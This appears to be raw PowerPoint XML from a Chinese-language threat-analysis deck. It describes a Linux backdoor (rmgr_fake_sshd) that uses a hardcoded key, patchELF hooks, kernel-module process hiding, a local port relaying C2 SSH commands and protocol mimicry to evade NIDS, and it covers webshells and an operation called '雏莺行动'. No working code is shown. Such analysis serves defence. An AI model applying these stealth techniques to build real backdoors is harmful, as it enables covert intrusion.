          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_fake_sshd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF1C178B-DCFC-4434-B639-B9D0F47572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7052" y="2994395"/>
            <a:ext cx="4048125" cy="3067050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174064941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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275913" y="1524185"/>
            <a:ext cx="8358422" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>作为后门它硬编码了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>PRIVATE KEY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，因为通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>patchELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>了部分函数，实现了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>登录之后的命令执行等行为的隐匿。而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>rmgr_fake_sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>本身，以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>登录派生的子进程均通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>根据前述分析通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>内核调用实现隐匿。监听在本地的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>26657</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>端口，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>连接此端口转发来至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>指令。这里实现了拟合业务环境常用网络协议，使得常规的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的检测逻辑被绕过。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr_fake_sshd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2DD2878-15D2-4A06-A587-A9A4550C1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029" y="2070126"/>
            <a:ext cx="6486525" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361353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3A15C5E-60C6-4276-81C9-F236C9C01EC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1209389"/>
            <a:ext cx="7772400" cy="3392591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>微软表示，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>月至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>月期间，每月检测到大约</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>万个网络恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，相比去年报告的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>7.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>万个，几乎翻了一倍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72F69E5D-E004-476B-89A5-1C26E547D622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其它：一句话木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7425AD22-81B3-4998-A89D-8962E900A9BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1223962" y="3192658"/>
            <a:ext cx="6696075" cy="3248025"/>
            <a:chOff x="1068934" y="3357550"/>
            <a:chExt cx="6696075" cy="3248025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="图片 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F3B5882-6BEB-4879-B8AE-47BAEF36BB19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1068934" y="3357550"/>
              <a:ext cx="6696075" cy="1990725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="图片 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEA4FD4B-3198-48F2-8100-33979BF85A87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1068934" y="5348275"/>
              <a:ext cx="6696075" cy="1257300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198172028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45E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实例隐蔽技术小结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EA24836-31E5-4EC7-A0BF-B09C2CDFAC6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2082276"/>
            <a:ext cx="9144000" cy="2693448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="内容占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B1F52B-DEAC-4290-B6F2-A295443BBF84}"/>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569977" y="1404781"/>
            <a:ext cx="8004046" cy="4711205"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1982000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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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69532" y="2518582"/>
            <a:ext cx="7004936" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>四、“雏莺行动”分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E6F56F1-ACAD-46A9-9752-17DD3A2B68DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069532" y="4075216"/>
            <a:ext cx="6791325" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206846880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BA619888-1566-4CC1-9C9C-E9319CD2176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101725"/>
            <a:ext cx="9144000" cy="5756223"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89E4AA3B-909D-499E-8691-B46275A0F4F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162652384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9E4AA3B-909D-499E-8691-B46275A0F4F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E400BD-8436-47F5-898D-7F7C61719397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="906515" y="1310012"/>
            <a:ext cx="6791325" cy="2428875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82D36DF0-B361-486E-B993-CC62BBABAE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="936495" y="3693917"/>
            <a:ext cx="6753225" cy="2276475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418855441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926DFFE-20EE-4678-8016-1B20FE067C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553883" y="1499016"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC23EF6-C11A-4ECF-8DE3-DC83A60F6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265119A3-0FB6-42D7-967E-6003D986AC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146" y="127416"/>
            <a:ext cx="8713694" cy="6587709"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3569564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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44B6E1B-2A57-419F-BFDB-4353232E14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666" y="1326577"/>
            <a:ext cx="8266667" cy="5114286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2104634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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>部分宏代码内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
